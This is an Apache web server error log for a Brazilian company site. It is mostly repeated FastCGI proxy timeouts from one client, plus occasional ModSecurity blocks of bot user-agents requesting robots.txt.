[Sun Mar 15 23:10:42.131313 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40382] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:11:03.841901 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40528] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:11:26.113944 2026] [proxy_fcgi:error] [pid 32654:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40648] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:11:47.133917 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40776] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:12:08.121219 2026] [proxy_fcgi:error] [pid 32654:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40988] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:12:29.094003 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:41108] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:12:51.063839 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41234] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:13:00.541684 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.228.16:41012] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdnKwlT9VtDQc7bgUxd5QAAAQg"]
[Sun Mar 15 23:13:12.121798 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41334] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:13:34.126650 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41494] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:13:55.125789 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41714] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:14:17.123155 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41844] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:14:38.117891 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41956] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:14:59.144580 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42090] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:15:21.122514 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42244] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:15:42.130980 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42320] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:16:04.129817 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42456] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:16:25.125831 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42610] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:16:47.124261 2026] [proxy_fcgi:error] [pid 32654:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42782] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:17:08.129861 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42952] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:17:24.348642 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.244.31:35170] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdoNAlT9VtDQc7bgUxeLAAAAQo"]
[Sun Mar 15 23:17:29.029859 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43044] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:17:50.812156 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:43186] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:18:02.700272 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.228.16:52228] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdoWnbQATo66fKoS7wSIgAAAMo"]
[Sun Mar 15 23:18:12.122106 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43296] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:18:34.129818 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43468] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:18:55.122294 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43590] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:19:16.078064 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43752] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:19:38.045921 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43882] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:19:59.125795 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44076] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:20:20.129949 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44266] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:20:43.133926 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44366] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:21:04.133815 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44514] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:21:26.137802 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44638] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:21:48.061985 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:44782] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:22:09.126401 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44860] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:22:30.133765 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:44980] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:22:50.133198 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.244.31:39806] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdpenjZBu2q05ozVU8a4wAAAUM"]
[Sun Mar 15 23:22:51.077802 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45144] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:23:12.057974 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45332] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:23:21.050333 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.228.16:46910] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdpmQlT9VtDQc7bgUxefwAAAQE"]
[Sun Mar 15 23:23:34.129814 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45424] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:23:55.069821 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45602] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:24:16.101836 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:45752] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:24:37.133817 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45902] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:24:58.049837 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46020] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:25:20.117797 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46230] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:25:41.049852 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46322] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:26:04.105271 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46550] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:26:25.070693 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:46692] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:26:46.129882 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46812] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:27:10.129837 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46946] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:27:31.129912 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47040] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:27:52.057895 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47192] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:28:00.912200 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.244.31:54194] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdqsAlT9VtDQc7bgUxe_wAAAQE"]
[Sun Mar 15 23:28:13.033821 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:47284] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:28:30.894942 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.228.16:48760] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdqzpqj1wV0Si-OkeeuwwAAAAw"]
[Sun Mar 15 23:28:34.129786 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47418] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:29:00.129817 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47686] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:29:21.041898 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47820] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:29:42.133820 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47960] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:30:04.126058 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48092] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:30:25.125852 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48248] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:30:46.117797 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:48376] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:31:07.130084 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48534] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:31:28.113917 2026] [proxy_fcgi:error] [pid 32654:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48668] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:31:49.131486 2026] [proxy_fcgi:error] [pid 32654:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:48910] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:32:10.131628 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49172] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:32:32.125806 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49420] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:32:53.129007 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49570] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:33:14.125944 2026] [proxy_fcgi:error] [pid 32654:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49670] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:33:26.226965 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.244.31:33182] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdr9nbQATo66fKoS7wTGAAAAME"]
[Sun Mar 15 23:33:35.129814 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49786] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:33:54.544802 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.228.16:40280] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdsEglT9VtDQc7bgUxgAwAAAQQ"]
[Sun Mar 15 23:33:56.133811 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49912] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:34:22.122010 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50090] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:34:43.129798 2026] [proxy_fcgi:error] [pid 32654:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50246] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:35:05.236520 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:35:26.080324 2026] [proxy_fcgi:error] [pid 32654:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50638] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:35:48.123325 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:50796] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:36:10.085906 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:50980] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:36:31.085815 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51118] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:36:52.057943 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51306] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:37:14.133779 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:51528] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:37:36.125855 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51698] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:37:57.133854 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51936] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:38:18.129855 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52110] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:38:28.912343 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.244.31:41426] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdtJAlT9VtDQc7bgUxgfgAAAQs"]
[Sun Mar 15 23:38:40.105222 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52256] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:39:01.133777 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52480] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:39:04.752311 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.228.16:43142] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abdtSHbQATo66fKoS7wTbwAAAME"]
[Sun Mar 15 23:39:22.129804 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52640] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:39:43.141837 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52856] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:40:04.121818 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53102] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:40:27.136013 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:40:49.130198 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53476] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:41:10.069822 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:53654] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:41:31.129904 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53826] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:41:52.160983 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53956] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:42:13.131926 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54112] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:42:37.413798 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:42:59.131481 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54538] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:43:20.129815 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54710] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:43:41.063599 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54898] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:43:49.691872 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.244.31:48550] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abduZQlT9VtDQc7bgUxhCQAAAQA"]
[Sun Mar 15 23:44:02.129865 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55044] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:44:23.141798 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55200] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:44:44.129878 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55340] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:45:05.137913 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55530] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:45:26.122982 2026] [proxy_fcgi:error] [pid 32654:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55700] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:45:48.125845 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:55988] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:46:11.125797 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:56200] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:46:32.125779 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56358] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:46:53.129811 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:56630] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:47:14.125847 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56828] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:47:35.129832 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57114] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:47:57.133810 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57424] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:48:19.129863 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57736] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:48:41.126006 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:58062] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:49:02.133829 2026] [proxy_fcgi:error] [pid 32654:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:58314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:49:23.135960 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:58562] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:49:44.122116 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58824] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:50:05.119227 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59034] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:50:26.137778 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59210] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:50:48.119429 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59446] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:51:10.033877 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59674] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:51:31.125925 2026] [proxy_fcgi:error] [pid 32654:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59836] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:51:54.121817 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60122] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:52:15.128488 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60364] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:52:36.125783 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60606] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:52:57.125784 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60842] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:53:18.145895 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:32838] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:53:41.097904 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33058] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 23:54:02.125795 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33344] AH01075: Error dispatching request to : (polling)
